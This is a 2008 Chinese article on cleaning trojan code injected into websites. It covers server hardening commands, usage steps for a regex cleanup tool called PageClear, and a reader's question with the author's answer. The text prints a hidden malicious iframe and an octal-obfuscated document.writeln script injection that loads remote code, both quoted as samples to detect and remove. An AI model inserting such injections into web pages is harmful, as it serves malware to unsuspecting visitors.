针对网站被挂马对策以及清除工具PageClear 1.0

http://www.xishuiw.com 2008年02月13日12:53 浠水网

  现在很流行的一种侵入方式是首先入侵WEB服务器,注入木马,然后以服务器为媒介,面对网站用户大量散发病毒,这种方式一般通过向网页尾部加入标记来隐藏自己并实现向用户的分发,如下图所示:

  要防止此类注入,首先要确保服务器安全性,一般ASP木马是通过Shell.Application、WScript.Shell、FSO、WScript.Network组件来实现其功能的,因此这几个组件必须禁止,执行下面的语句,即可做到初步防范。

regsvr32 /u c:\windows\system32\scrrun.dll cacls C:\WINNT\system32\shell32.dll /e /d guests regsvr32/u C:\WINNT\System32\wshom.ocx cacls C:\WINNT\system32\Cmd.exe /e /d guests

  网站一旦被入侵,要清理是相当麻烦的,稍大点的网站动辄几百个页面,高级点的入侵甚至会采取一些随机代码来避开普通的替换工具。所以我写了一个清除工具PageClear,主要是清除网页木马,这是一个正则表达式替换器,因此也可以用作一些批量文本的匹配,替换工具。

  使用说明:
1 选择要清理的目录,该工具可查找指定目录下(包括子目录)所有符合条件的文件。
2 指定匹配正则表达式,你可以直接复制木马代码,如“〈iframe src= http://xxx.mmma.biz/ ps.htm width=0 height=0>”。或使用正则来匹配各种样本。
3 替换表达式一般为空,也可以填写你想要替换的内容。
4 操作的文件类型:你要操作的文件扩展名,用axy隔开,注意前面不要漏了"."符号。
5 测试文本:对你设定的正则表达式的测试。

  建议指定正则表达式后将网页样本复制到测试文本框中进行测试,确认无误后点击“开始清理”,即可执行清理工作了。

  本工具需要.net Framework 2.0支持,电脑装此框架的可以去微软网站下载:Microsoft .NET Framework 2.0 版可再发行组件包 (x86)下载PageClear1.0 大小:36K

-----------------------------------------------------------------------------------------

  我的服务器被插入以下 JS代码
document.writeln("\74\163\143\162\151\160\164\40\163\162\143\75\42\150\164\164\160\72\57\57\167\45\67\67\167\45\63\63\56\144\45\66\64\156\163\56\45\66\71\156\146\157\57\45\66\71\45\66\105\45\66\66\45\66\106\45\62\105\45\66\101\45\67\63\42\76\74\57\163\143\162\151\160\164\76");
  这个怎么用你的表达式查呢,现在这个病毒很猖狂阿,我服务器所有.JS都感染了!

  正则表达式处填入:
document.writeln\("\\74\\163\\143[\s\S]+?\);
  然后选择中毒的文件,即可清除。


发表评论
上一篇网页的加密解密之8位二进制ASCII码加密解密方法
下一篇最新SMSJ Version 8.0漏洞
正在加载中……